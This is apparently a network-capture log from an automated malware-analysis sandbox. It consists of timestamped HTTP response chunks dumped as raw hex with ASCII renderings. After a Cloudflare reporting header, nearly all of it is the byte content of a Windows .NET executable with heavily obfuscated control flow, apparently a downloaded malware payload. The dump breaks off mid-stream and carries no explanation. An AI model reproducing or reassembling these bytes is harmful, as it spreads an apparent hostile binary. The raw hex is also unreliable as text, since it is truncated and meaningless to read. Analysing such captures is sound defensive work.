                                                                                                                                  2021-12-18 14:32:00 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 53 33 38 25 32 46 44 75 4a 77 68 25 32 42 48 56 37 6f 53 4c 38 66 41 6b 55 71 65 56 42 58 5a 55 37 4b 30 4f 32 53 34 4e 63 59 25 32 42 33 52 59 64 49 53 79 41 42 75 64 71 25 32 42 38 37 68 45 6f 69 59 63 47 6f 4f 54 33 70 46 62 62 61 35 4c 6c 65 65 6c 25 32 46 43 55 79 4e 35 46 44 30 6c 78 54 38 51 59 30 61 6c 79 7a 47 53 6b 50 78 79 69 79 45 4b 39 31 72 72 6c 76 51 6a 44 76 34 44 47 38 64 6e 47 50 48 61 4c 74 62 64 44 33 58 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61
                                                                                                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S38%2FDuJwh%2BHV7oSL8fAkUqeVBXZU7K0O2S4NcY%2B3RYdISyABudq%2B87hEoiYcGoOT3pFbba5Lleel%2FCUyN5FD0lxT8QY0alyzGSkPxyiyEK91rrlvQjDv4DG8dnGPHaLtbdD3Xg%3D%3D"}],"group":"cf-nel","max_a
                                                                                                                                  2021-12-18 14:32:00 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3f 11 ae a6 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 4a 08 00 00 06 00 00 00 00 00 00 ee 68 08 00 00 20 00 00 00 80 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL?0Jh @ @
                                                                                                                                  2021-12-18 14:32:00 UTC2INData Raw: 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 92 28 a9 00 00 06 38 10 00 00 00 72 40 0c 00 70 80 19 00 00 04 38 00 00 00 00 2a 28 5d 01 00 06 38 e6 ff ff ff 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 00 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 12 00 00 00 2a 00 00 00 13 30 0e 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00 1a 28 a9 00 00 06 2a 00
                                                                                                                                  Data Ascii: **(*(8r@p8*(]8*******(*(**0***(*(*(*(*(*(*(*(*(*(*
                                                                                                                                  2021-12-18 14:32:00 UTC4INData Raw: 05 11 06 09 11 04 1f 0a 1f 11 1f 0b 06 28 92 00 00 06 12 04 11 05 11 06 09 1f 0b 1f 16 1f 0c 06 28 92 00 00 06 12 03 11 04 11 05 11 06 1f 0c 1d 1f 0d 06 28 92 00 00 06 12 06 09 11 04 11 05 1f 0d 1f 0c 1f 0e 06 28 92 00 00 06 12 05 11 06 09 11 04 1f 0e 1f 11 1f 0f 06 28 92 00 00 06 12 04 11 05 11 06 09 1f 0f 1f 16 1f 10 06 28 92 00 00 06 12 03 11 04 11 05 11 06 17 1b 1f 11 06 28 93 00 00 06 12 06 09 11 04 11 05 1c 1f 09 1f 12 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0b 1f 0e 1f 13 06 28 93 00 00 06 12 04 11 05 11 06 09 16 1f 14 1f 14 06 28 93 00 00 06 12 03 11 04 11 05 11 06 1b 1b 1f 15 06 28 93 00 00 06 12 06 09 11 04 11 05 1f 0a 1f 09 1f 16 06 28 93 00 00 06 12 05 11 06 09 11 04 1f 0f 1f 0e 1f 17 06 28 93 00 00 06 12 04 11 05 11 06 09 1a 1f 14 1f 18 06
                                                                                                                                  Data Ascii: (((((((((((((
                                                                                                                                  2021-12-18 14:32:00 UTC5INData Raw: 0b 05 8e 69 8d 17 00 00 01 0c 03 8e 69 1a 5b 0d 16 13 04 16 13 05 16 13 06 06 16 3e 04 00 00 00 07 17 58 0b 16 13 07 16 13 08 38 77 01 00 00 11 08 09 5d 13 09 11 08 1a 5a 13 0a 11 09 1a 5a 13 07 03 11 07 19 58 91 1f 18 62 03 11 07 18 58 91 1f 10 62 60 03 11 07 17 58 91 1e 62 60 03 11 07 91 60 13 05 20 ff 00 00 00 13 0b 16 13 0c 11 08 07 17 59 40 49 00 00 00 06 16 3e 42 00 00 00 16 13 06 11 04 11 05 58 13 04 16 13 0d 38 23 00 00 00 11 0d 16 3e 06 00 00 00 11 06 1e 62 13 06 11 06 05 05 8e 69 17 11 0d 58 59 91 60 13 06 11 0d 17 58 13 0d 11 0d 06 3f d5 ff ff ff 38 2e 00 00 00 11 04 11 05 58 13 04 11 0a 13 07 05 11 07 19 58 91 1f 18 62 05 11 07 18 58 91 1f 10 62 60 05 11 07 17 58 91 1e 62 60 05 11 07 91 60 13 06 11 04 16 13 04 25 28 a1 00 00 06 58 13 04 11 08
                                                                                                                                  Data Ascii: ii[>X8w]ZZXbXb`Xb`` Y@I>BX8#>biXY`X?8.XXbXb`Xb``%(X
                                                                                                                                  2021-12-18 14:32:00 UTC6INData Raw: fe 0c 26 00 1f 0c 64 59 fe 0e 26 00 20 76 c2 00 00 fe 0c 26 00 5a fe 0c 27 00 59 fe 0e 26 00 fe 0c 26 00 fe 0c 26 00 fe 0c 26 00 59 61 fe 0e 2b 00 fe 0c 28 00 fe 0c 28 00 1f 19 62 61 fe 0e 28 00 fe 0c 28 00 fe 0c 29 00 58 fe 0e 28 00 fe 0c 28 00 fe 0c 28 00 1d 62 61 fe 0e 28 00 fe 0c 28 00 fe 0c 2a 00 58 fe 0e 28 00 fe 0c 28 00 fe 0c 28 00 1f 0d 64 61 fe 0e 28 00 fe 0c 28 00 fe 0c 2b 00 58 fe 0e 28 00 fe 0c 29 00 1b 62 fe 0c 29 00 58 fe 0c 29 00 61 fe 0c 28 00 58 fe 0e 28 00 fe 0c 28 00 76 6c 6d 58 13 09 11 0e 11 07 17 59 40 53 00 00 00 11 06 16 3e 4b 00 00 00 11 09 11 0a 61 13 13 16 13 14 38 2e 00 00 00 11 14 16 3e 0c 00 00 00 11 10 1e 62 13 10 11 11 1e 58 13 11 11 08 11 0f 11 14 58 11 13 11 10 5f 11 11 1f 1f 5f 64 d2 9c 11 14 17 58 13 14 11 14 11 06 3f
                                                                                                                                  Data Ascii: &dY& v&Z'Y&&&&Ya+((ba(()X(((ba((*X(((da((+X()b)X)a(X((vlmXY@S>Ka8.>bXX__dX?
                                                                                                                                  2021-12-18 14:32:00 UTC8INData Raw: 00 04 39 28 00 00 00 11 04 10 04 0e 05 09 7b 72 00 00 04 8e 69 54 0e 04 09 7b 72 00 00 04 8e 69 1f 40 7f 69 00 00 04 28 b0 00 00 06 26 16 2a 06 28 65 00 00 0a 18 5a 11 04 28 6b 00 00 0a 06 28 65 00 00 0a 19 5a 09 7b 72 00 00 04 8e 69 28 6c 00 00 0a 16 13 05 05 20 7d 1d ea 0c 40 0a 00 00 00 7e 5d 00 00 04 39 19 00 00 00 7e 5b 00 00 04 02 03 04 05 0e 04 0e 05 6f 2f 01 00 06 13 05 38 06 00 00 00 17 80 5d 00 00 04 11 05 2a 7e 5b 00 00 04 02 03 04 05 0e 04 0e 05 6f 2f 01 00 06 2a 00 00 00 0a 1b 2a 00 1b 30 02 00 12 00 00 00 00 00 00 00 17 28 2a 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 01 10 00 00 00 00 00 00 0b 0b 00 06 0a 00 00 01 13 30 07 00 53 00 00 00 00 00 00 00 d0 51 00 00 01 28 23 00 00 0a 72 19 0e 00 70 18 8d 24 00 00 01 25 16 d0 14 00 00 01
                                                                                                                                  Data Ascii: 9({riT{ri@i(&*(eZ(k(eZ{ri(l }@~]9~[o/8]*~[o/**0(*&*0SQ(#rp$%
                                                                                                                                  2021-12-18 14:32:00 UTC9INData Raw: 00 19 06 00 00 17 16 00 00 c6 26 00 00 fe 20 00 00 84 53 00 00 69 22 00 00 ec 47 00 00 75 58 00 00 90 3d 00 00 f3 3d 00 00 93 2f 00 00 23 03 00 00 c0 28 00 00 69 24 00 00 d3 2e 00 00 29 2d 00 00 0c 3e 00 00 fb 1f 00 00 92 23 00 00 4d 2e 00 00 5c 2a 00 00 ca 4b 00 00 07 59 00 00 30 00 00 00 67 33 00 00 d9 58 00 00 3c 16 00 00 cb 29 00 00 d0 1a 00 00 a9 27 00 00 f5 0d 00 00 26 3f 00 00 aa 17 00 00 3e 0f 00 00 17 0c 00 00 d8 07 00 00 c1 52 00 00 73 4b 00 00 ec 36 00 00 56 57 00 00 71 4d 00 00 0d 25 00 00 4a 26 00 00 93 24 00 00 f0 4e 00 00 e0 49 00 00 6d 20 00 00 7a 49 00 00 ec 3c 00 00 7c 2b 00 00 e6 43 00 00 b8 49 00 00 74 59 00 00 55 16 00 00 8a 14 00 00 19 26 00 00 35 1d 00 00 0c 53 00 00 d8 43 00 00 16 27 00 00 80 37 00 00 52 22 00 00 e0 19 00 00 0c 46
                                                                                                                                  Data Ascii: & Si"GuX==/#(i$.)->#M.\*KY0g3X<)'&?>RsK6VWqM%J&$NIm zI<|+CItYU&5SC'7R"F
                                                                                                                                  2021-12-18 14:32:00 UTC10INData Raw: 9b 35 00 00 75 0e 00 00 fd 3e 00 00 b4 2b 00 00 5f 08 00 00 f7 12 00 00 fd 44 00 00 ca 1d 00 00 62 48 00 00 f8 19 00 00 50 4f 00 00 4e 2b 00 00 bc 45 00 00 66 25 00 00 42 2c 00 00 65 2d 00 00 75 1f 00 00 cd 36 00 00 ae 52 00 00 d0 48 00 00 1d 00 00 00 ed 4a 00 00 08 32 00 00 11 24 00 00 fd 05 00 00 8f 01 00 00 bf 21 00 00 ca 4a 00 00 42 1b 00 00 ac 1b 00 00 36 06 00 00 78 0c 00 00 d8 0b 00 00 de 24 00 00 83 4c 00 00 e2 4b 00 00 4a 21 00 00 4a 56 00 00 e8 06 00 00 e9 21 00 00 de 57 00 00 05 4a 00 00 e3 3b 00 00 f6 23 00 00 9b 09 00 00 2b 56 00 00 99 00 00 00 45 15 00 00 6d 19 00 00 11 19 00 00 4e 1a 00 00 96 27 00 00 4f 0c 00 00 2f 16 00 00 49 3e 00 00 c4 43 00 00 30 32 00 00 2c 4f 00 00 4d 3d 00 00 c8 02 00 00 f1 58 00 00 28 29 00 00 2d 01 00 00 6f 37 00
                                                                                                                                  Data Ascii: 5u>+_DbHPON+Ef%B,e-u6RHJ2$!JB6x$LKJ!JV!WJ;#+VEmN'O/I>C02,OM=X()-o7
                                                                                                                                  2021-12-18 14:32:00 UTC12INData Raw: 51 16 91 9c 20 f3 00 00 00 38 3c f1 ff ff 20 18 00 00 00 20 32 00 00 00 58 fe 0e 35 00 20 5f 01 00 00 28 1e 01 00 06 3a 1e f1 ff ff 26 20 5a 00 00 00 38 13 f1 ff ff 28 ce 00 00 06 28 d7 00 00 06 28 d8 00 00 06 13 0a 20 14 00 00 00 38 f8 f0 ff ff 20 65 00 00 00 20 14 00 00 00 58 fe 0e 3b 00 20 f6 01 00 00 38 df f0 ff ff 11 74 11 72 18 58 11 51 18 91 9c 20 2d 01 00 00 28 1f 01 00 06 39 c5 f0 ff ff 26 20 7e 00 00 00 38 ba f0 ff ff 38 9d 1c 00 00 20 ca 00 00 00 38 ab f0 ff ff 20 39 00 00 00 20 7b 00 00 00 58 fe 0e 33 00 20 0d 00 00 00 38 92 f0 ff ff 11 74 11 72 11 6f 16 91 9c 20 4d 01 00 00 fe 0e 22 00 38 77 f0 ff ff fe 0c 49 00 20 05 00 00 00 20 5a 00 00 00 20 69 00 00 00 58 9c 20 37 00 00 00 38 5c f0 ff ff fe 0c 10 00 20 1f 00 00 00 fe 0c 33 00 9c 20 7c 00
                                                                                                                                  Data Ascii: Q 8< 2X5 _(:& Z8((( 8 e X; 8trXQ -(9& ~88 8 9 {X3 8tro M"8wI Z iX 78\ 3 |
                                                                                                                                  2021-12-18 14:32:00 UTC13INData Raw: 28 f3 00 00 06 13 4a 20 d8 01 00 00 38 e0 eb ff ff 7e 0a 00 00 0a 13 24 20 53 00 00 00 38 cf eb ff ff 11 29 1a 1a 12 15 28 b0 00 00 06 3a e0 0f 00 00 20 92 02 00 00 38 b5 eb ff ff d0 29 00 00 02 28 03 01 00 06 6f 24 00 00 0a 28 0e 01 00 06 28 12 01 00 06 8e 69 18 40 95 09 00 00 20 61 00 00 00 38 8a eb ff ff 00 11 77 73 6f 00 00 0a d0 2e 00 00 02 28 03 01 00 06 28 08 01 00 06 74 2e 00 00 02 80 5b 00 00 04 20 00 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 0d 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd 6d 29 00 00 26 20 00 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 0f 00 45 02 00 00 00 05 00 00 00 d9 00 00 00 38 00 00 00 00 00 11 77 73 6f 00 00 0a d0 2e 00 00 02 28 03 01 00 06 28 08 01
                                                                                                                                  Data Ascii: (J 8~$ S8)(: 8)(o$((i@ a8wso.((t.[ (:& 8E8m)& (:& 8E8wso.((
                                                                                                                                  2021-12-18 14:32:00 UTC14INData Raw: 06 3a 92 e6 ff ff 26 20 04 00 00 00 38 87 e6 ff ff 11 71 11 00 5d 13 1b 20 9d 01 00 00 28 1e 01 00 06 39 71 e6 ff ff 26 20 a7 01 00 00 38 66 e6 ff ff 20 a6 00 00 00 20 37 00 00 00 59 fe 0e 33 00 20 0c 00 00 00 28 1e 01 00 06 39 48 e6 ff ff 26 20 4d 00 00 00 38 3d e6 ff ff 20 85 00 00 00 20 2c 00 00 00 59 fe 0e 33 00 20 56 01 00 00 38 24 e6 ff ff 16 6a 13 77 20 c7 00 00 00 28 1e 01 00 06 3a 11 e6 ff ff 26 20 02 00 00 00 38 06 e6 ff ff 11 64 28 fa 00 00 06 20 c7 01 00 00 38 f5 e5 ff ff 11 74 11 13 1a 58 11 70 1a 91 9c 20 ba 00 00 00 38 e0 e5 ff ff 11 27 11 6c 11 25 20 ff 00 00 00 5f d2 9c 20 00 00 00 00 28 1f 01 00 06 3a c3 e5 ff ff 26 20 0a 00 00 00 38 b8 e5 ff ff 11 5e 11 08 1a 5a 11 15 12 15 28 b0 00 00 06 26 20 98 00 00 00 28 1f 01 00 06 3a 99 e5 ff ff
                                                                                                                                  Data Ascii: :& 8q] (9q& 8f 7Y3 (9H& M8= ,Y3 V8$jw (:& 8d( 8tXp 8'l% _ (:& 8^Z(& (:
                                                                                                                                  2021-12-18 14:32:00 UTC16INData Raw: 3b e1 ff ff 11 4f 8e 69 1a 5d 13 38 20 86 01 00 00 28 1e 01 00 06 3a 24 e1 ff ff 26 20 c5 00 00 00 38 19 e1 ff ff fe 0c 10 00 20 04 00 00 00 fe 0c 33 00 9c 20 c3 00 00 00 28 1e 01 00 06 39 fc e0 ff ff 26 20 14 02 00 00 38 f1 e0 ff ff 11 1a 28 f3 00 00 06 26 20 fb 01 00 00 28 1e 01 00 06 3a da e0 ff ff 26 20 99 01 00 00 38 cf e0 ff ff 11 74 11 13 1a 58 11 6f 1a 91 9c 20 5e 00 00 00 fe 0e 22 00 38 b2 e0 ff ff 28 d4 00 00 06 1a 3b 42 30 00 00 20 45 02 00 00 38 a1 e0 ff ff 20 b8 00 00 00 20 23 00 00 00 58 fe 0e 33 00 20 1c 00 00 00 28 1f 01 00 06 3a 83 e0 ff ff 26 20 77 00 00 00 38 78 e0 ff ff 20 8f 00 00 00 20 2f 00 00 00 59 fe 0e 3b 00 20 a1 00 00 00 28 1f 01 00 06 3a 5a e0 ff ff 26 20 64 01 00 00 38 4f e0 ff ff 20 31 00 00 00 20 1d 00 00 00 58 fe 0e 33 00
                                                                                                                                  Data Ascii: ;Oi]8 (:$& 8 3 (9& 8(& (:& 8tXo ^"8(;B0 E8 #X3 (:& w8x /Y; (:Z& d8O 1 X3
                                                                                                                                  2021-12-18 14:32:00 UTC17INData Raw: 00 00 38 df db ff ff 28 d4 00 00 06 1a 40 fa 29 00 00 20 f4 01 00 00 28 1f 01 00 06 39 c5 db ff ff 26 20 9f 00 00 00 38 ba db ff ff fe 0c 49 00 20 02 00 00 00 20 ca 00 00 00 20 43 00 00 00 59 9c 20 e4 00 00 00 38 9b db ff ff fe 0c 10 00 20 0a 00 00 00 fe 0c 33 00 9c 20 67 00 00 00 38 83 db ff ff fe 0c 10 00 20 12 00 00 00 fe 0c 33 00 9c 20 8a 02 00 00 38 6b db ff ff fe 0c 49 00 20 0b 00 00 00 20 94 00 00 00 20 31 00 00 00 59 9c 20 6a 00 00 00 38 4c db ff ff 11 4c 17 58 13 4c 20 a0 01 00 00 38 3c db ff ff 38 1c 3b 00 00 20 3a 01 00 00 38 2d db ff ff 12 5e 7e 64 00 00 04 11 28 6a 58 11 54 6a 59 28 6f 00 00 0a 20 12 00 00 00 28 1f 01 00 06 3a 0a db ff ff 26 20 68 02 00 00 38 ff da ff ff 1f 0c 8d 17 00 00 01 13 56 20 79 00 00 00 38 ec da ff ff fe 0c 10 00 20
                                                                                                                                  Data Ascii: 8(@) (9& 8I CY 8 3 g8 3 8kI 1Y j8LLXL 8<8; :8-^~d(jXTjY(o (:& h8V y8
                                                                                                                                  2021-12-18 14:32:00 UTC18INData Raw: 1e 01 00 06 39 84 d6 ff ff 26 20 a6 00 00 00 38 79 d6 ff ff 11 2f 73 6f 00 00 0a 28 0b 01 00 06 13 77 20 89 01 00 00 fe 0e 22 00 38 59 d6 ff ff 11 74 11 13 1c 58 11 70 1c 91 9c 20 23 02 00 00 38 48 d6 ff ff 12 11 e0 73 70 00 00 0a 16 28 c7 00 00 06 26 20 59 02 00 00 38 2f d6 ff ff 20 5f 00 00 00 20 53 00 00 00 58 fe 0e 33 00 20 00 00 00 00 28 1e 01 00 06 3a 11 d6 ff ff 26 20 00 00 00 00 38 06 d6 ff ff 11 56 1f 09 1f 64 9c 20 9c 00 00 00 28 1f 01 00 06 39 f0 d5 ff ff 26 20 29 00 00 00 38 e5 d5 ff ff fe 0c 10 00 20 04 00 00 00 fe 0c 33 00 9c 20 13 00 00 00 38 cd d5 ff ff 14 13 70 20 9f 01 00 00 fe 0e 22 00 38 b8 d5 ff ff 20 79 00 00 00 20 6e 00 00 00 59 fe 0e 3b 00 20 1a 00 00 00 28 1e 01 00 06 39 9e d5 ff ff 26 20 24 00 00 00 38 93 d5 ff ff 11 32 28 ab 00
                                                                                                                                  Data Ascii: 9& 8y/so(w "8YtXp #8Hsp(& Y8/ _ SX3 (:& 8Vd (9& )8 3 8p "8 y nY; (9& $82(
                                                                                                                                  2021-12-18 14:32:00 UTC20INData Raw: 00 00 00 58 fe 0e 33 00 20 f6 01 00 00 28 1f 01 00 06 3a 1d d1 ff ff 26 20 5f 02 00 00 38 12 d1 ff ff 20 d6 00 00 00 20 47 00 00 00 59 fe 0e 33 00 20 e1 00 00 00 38 f9 d0 ff ff 11 5c 39 d9 e1 ff ff 20 12 02 00 00 38 e8 d0 ff ff 11 74 11 13 1b 58 11 51 1b 91 9c 20 8e 01 00 00 38 d3 d0 ff ff 28 d4 00 00 06 1a 40 66 e1 ff ff 20 17 01 00 00 28 1e 01 00 06 3a b9 d0 ff ff 26 20 0d 00 00 00 38 ae d0 ff ff 20 f4 f3 f2 f1 13 1e 20 73 02 00 00 38 9d d0 ff ff 11 09 17 58 13 09 20 64 02 00 00 28 1f 01 00 06 39 88 d0 ff ff 26 20 24 01 00 00 38 7d d0 ff ff 38 36 17 00 00 20 03 00 00 00 38 6e d0 ff ff 11 4f 11 3e 19 58 91 1f 18 62 11 4f 11 3e 18 58 91 1f 10 62 60 11 4f 11 3e 17 58 91 1e 62 60 11 4f 11 3e 91 60 13 14 20 e9 01 00 00 28 1e 01 00 06 3a 38 d0 ff ff 26 20 9a
                                                                                                                                  Data Ascii: X3 (:& _8 GY3 8\9 8tXQ 8(@f (:& 8 s8X d(9& $8}86 8nO>XbO>Xb`O>Xb`O>` (:8&
                                                                                                                                  2021-12-18 14:32:00 UTC21INData Raw: 00 38 d5 cb ff ff 11 1a 11 36 28 ea 00 00 06 13 67 20 01 00 00 00 28 1f 01 00 06 39 bb cb ff ff 26 20 00 00 00 00 38 b0 cb ff ff 11 6b 11 44 1e 5a 58 e0 25 4c 20 a1 3a d5 4e 6a 61 55 20 42 02 00 00 38 94 cb ff ff 1f 0a 8d 17 00 00 01 13 56 20 de 00 00 00 28 1f 01 00 06 3a 7c cb ff ff 26 20 34 01 00 00 38 71 cb ff ff 11 56 1f 0a 1f 6c 9c 20 1d 01 00 00 fe 0e 22 00 38 58 cb ff ff 16 e0 13 6b 20 55 00 00 00 38 4e cb ff ff fe 0c 49 00 20 03 00 00 00 20 11 00 00 00 20 6d 00 00 00 58 9c 20 29 00 00 00 28 1f 01 00 06 3a 2a cb ff ff 26 20 ed 00 00 00 38 1f cb ff ff fe 0c 10 00 20 0b 00 00 00 fe 0c 33 00 9c 20 ca 01 00 00 38 07 cb ff ff 11 27 11 6c 17 58 11 25 20 00 ff 00 00 5f 1e 64 d2 9c 20 6d 00 00 00 28 1f 01 00 06 3a e6 ca ff ff 26 20 38 01 00 00 38 db ca ff
                                                                                                                                  Data Ascii: 86(g (9& 8kDZX%L :NjaU B8V (:|& 48qVl "8Xk U8NI mX )(:*& 8 3 8'lX% _d m(:& 88
                                                                                                                                  2021-12-18 14:32:00 UTC22INData Raw: 00 00 20 33 00 00 00 28 1e 01 00 06 39 71 c6 ff ff 26 20 89 00 00 00 38 66 c6 ff ff fe 0c 49 00 20 07 00 00 00 20 06 00 00 00 20 10 00 00 00 58 9c 20 1e 00 00 00 28 1e 01 00 06 39 42 c6 ff ff 26 20 5e 01 00 00 38 37 c6 ff ff fe 0c 10 00 20 1e 00 00 00 20 7b 00 00 00 20 64 00 00 00 58 9c 20 4a 00 00 00 28 1f 01 00 06 3a 13 c6 ff ff 26 20 50 00 00 00 38 08 c6 ff ff 11 12 1a 1f 69 9c 20 a0 00 00 00 28 1e 01 00 06 39 f3 c5 ff ff 26 20 48 01 00 00 38 e8 c5 ff ff 00 11 5d 28 d7 00 00 06 28 d8 00 00 06 13 0a 20 00 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 65 00 45 02 00 00 00 05 00 00 00 64 01 00 00 38 00 00 00 00 00 38 40 00 00 00 20 01 00 00 00 28 1f 01 00 06 3a 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00 fe 0c 31 00 45 06
                                                                                                                                  Data Ascii: 3(9q& 8fI X (9B& ^87 { dX J(:& P8i (9& H8](( (:& 8eEd88@ (:& 81E
                                                                                                                                  2021-12-18 14:32:00 UTC24INData Raw: 00 28 1e 01 00 06 3a 1e c1 ff ff 26 20 57 01 00 00 38 13 c1 ff ff 20 41 00 00 00 20 62 00 00 00 58 fe 0e 33 00 20 ca 00 00 00 28 1f 01 00 06 3a f5 c0 ff ff 26 20 33 01 00 00 38 ea c0 ff ff 20 52 00 00 00 20 32 00 00 00 58 fe 0e 33 00 20 9a 01 00 00 38 d1 c0 ff ff 12 40 fe 15 30 00 00 02 20 40 01 00 00 38 bf c0 ff ff 11 74 11 72 18 58 11 6f 18 91 9c 20 a2 01 00 00 38 aa c0 ff ff 16 13 0e 20 92 00 00 00 38 9d c0 ff ff 11 21 16 28 c5 00 00 06 26 20 1a 00 00 00 28 1e 01 00 06 3a 85 c0 ff ff 26 20 17 00 00 00 38 7a c0 ff ff 20 71 00 00 00 20 6d 00 00 00 58 fe 0e 33 00 20 07 02 00 00 28 1e 01 00 06 3a 5c c0 ff ff 26 20 0b 00 00 00 38 51 c0 ff ff 11 1a 28 f3 00 00 06 13 4b 20 fe 00 00 00 fe 0e 22 00 38 36 c0 ff ff 11 4f 8e 69 8d 17 00 00 01 13 27 20 cd 01 00 00
                                                                                                                                  Data Ascii: (:& W8 A bX3 (:& 38 R 2X3 8@0 @8trXo 8 8!(& (:& 8z q mX3 (:\& 8Q(K "86Oi'
                                                                                                                                  2021-12-18 14:32:00 UTC25INData Raw: 06 20 00 00 00 00 28 1f 01 00 06 39 b3 ff ff ff 26 20 00 00 00 00 38 a8 ff ff ff dc 20 01 00 00 00 28 1f 01 00 06 3a d7 fd ff ff 26 20 01 00 00 00 38 cc fd ff ff dd 30 11 00 00 26 20 00 00 00 00 28 1e 01 00 06 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 59 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 dd fe 10 00 00 20 f7 01 00 00 38 59 bb ff ff fe 0c 10 00 13 1c 20 a3 01 00 00 28 1e 01 00 06 3a 44 bb ff ff 26 20 d8 00 00 00 38 39 bb ff ff fe 0c 49 00 20 0a 00 00 00 20 2b 00 00 00 20 03 00 00 00 58 9c 20 2f 02 00 00 38 1a bb ff ff fe 0c 49 00 20 0a 00 00 00 20 9a 00 00 00 20 33 00 00 00 59 9c 20 8e 02 00 00 fe 0e 22 00 38 f3 ba ff ff fe 0c 10 00 20 16 00 00 00 fe 0c 33 00 9c 20 36 02 00 00 28 1f 01 00 06 39 da ba ff ff 26 20 25 00 00 00 38 cf ba
                                                                                                                                  Data Ascii: (9& 8 (:& 80& (:& 8YE8 8Y (:D& 89I + X /8I 3Y "8 3 6(9& %8
                                                                                                                                  2021-12-18 14:32:00 UTC26INData Raw: 00 00 00 58 fe 0e 33 00 20 1e 00 00 00 28 1e 01 00 06 3a 60 b6 ff ff 26 20 1b 00 00 00 38 55 b6 ff ff 00 d0 29 00 00 02 28 03 01 00 06 6f 24 00 00 0a 28 13 01 00 06 28 14 01 00 06 8c 57 00 00 01 28 15 01 00 06 72 ef 0e 00 70 1f 34 6f 74 00 00 0a d0 29 00 00 02 28 03 01 00 06 6f 24 00 00 0a 28 13 01 00 06 28 14 01 00 06 8c 57 00 00 01 28 16 01 00 06 13 42 20 02 00 00 00 28 1e 01 00 06 39 0f 00 00 00 26 20 0e 00 00 00 38 04 00 00 00 fe 0c 17 00 45 13 00 00 00 3a 02 00 00 b5 00 00 00 ef 01 00 00 2a 03 00 00 e0 01 00 00 5e 00 00 00 c5 02 00 00 b0 02 00 00 09 03 00 00 4b 02 00 00 1b 00 00 00 3f 00 00 00 70 02 00 00 2c 00 00 00 05 00 00 00 14 02 00 00 8d 02 00 00 e7 02 00 00 83 00 00 00 38 35 02 00 00 11 42 75 14 00 00 01 3a 03 02 00 00 20 0b 00 00 00 38 94 ff
                                                                                                                                  Data Ascii: X3 (:`& 8U)(o$((W(rp4ot)(o$((W(B (9& 8E:*^K?p,85Bu: 8
                                                                                                                                  2021-12-18 14:32:00 UTC28INData Raw: 00 00 00 38 16 b1 ff ff fe 0c 49 00 20 0f 00 00 00 20 23 00 00 00 20 25 00 00 00 58 9c 20 3f 01 00 00 38 f7 b0 ff ff 16 13 14 20 0f 00 00 00 28 1f 01 00 06 3a e5 b0 ff ff 26 20 7b 00 00 00 38 da b0 ff ff 20 70 00 00 00 20 2f 00 00 00 58 fe 0e 33 00 20 e9 00 00 00 38 c1 b0 ff ff 2a 28 d4 00 00 06 1a 40 73 f7 ff ff 20 a6 01 00 00 28 1f 01 00 06 39 a6 b0 ff ff 26 20 2c 01 00 00 38 9b b0 ff ff 20 60 00 00 00 20 0a 00 00 00 58 fe 0e 33 00 20 2e 02 00 00 fe 0e 22 00 38 7a b0 ff ff 28 d4 00 00 06 1a 40 21 e3 ff ff 20 9d 00 00 00 38 69 b0 ff ff 1f 1e 8d 17 00 00 01 25 d0 0a 01 00 04 28 1b 01 00 06 13 26 20 20 02 00 00 38 4b b0 ff ff 11 27 11 6c 19 58 11 25 20 00 00 00 ff 5f 1f 18 64 d2 9c 20 f0 01 00 00 38 2e b0 ff ff fe 0c 49 00 20 0d 00 00 00 20 cb 00 00 00 20
